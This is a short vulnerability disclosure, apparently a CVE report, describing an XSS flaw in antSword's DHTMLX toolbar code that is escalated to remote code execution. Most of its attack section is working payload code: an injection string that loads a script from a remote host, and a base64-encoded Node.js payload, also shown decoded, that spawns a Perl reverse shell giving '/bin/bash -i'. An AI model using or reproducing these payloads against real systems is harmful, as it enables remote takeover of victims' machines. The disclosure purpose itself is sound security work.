1# Report CVE RCE Vulnerability in antSword

xss

The XSS in the classification directory has not been repaired, possibly because it is too weak and neglected by the authorities

The JS substitution is obviously used here, but the authorities forgot to filter the use of single quotes, so we can take advantage of it here

It uses the DHTMLX framework.

In the framework DHTMLXOOLBAR.JS file, we found the vulnerability at line 1775.

this.obj.innerHTML = "<input class='dhxtoolbar_input' type='text' style='width:"+this.obj.w+"px;'"+(data.value!=null?" value='"+data.value+"'":"")+">"; ```

The content will be output unchanged to value value='"+data.value+"'":"")+">"; Resulting in vulnerabilities in XSS.

0x03 ## Attack approach.

Building the oninput to trigger the XSS

Next ,we’ll building the payload to finished the SSJI(server side javascript inject).

In the end

POC: 'autofocus onfocus=alertxss;'

Payload: 'autofocus onfocus=$.getScript(unescape('http%3A%2f%2fxxx.in%2f2Yuo%0A'));'

payload:

eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU 29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1 NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9 pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VU LCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJ ycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3 Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())

Decoding Base64 : require('child_process').exec('perl -e 'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotoby name("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN, ">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });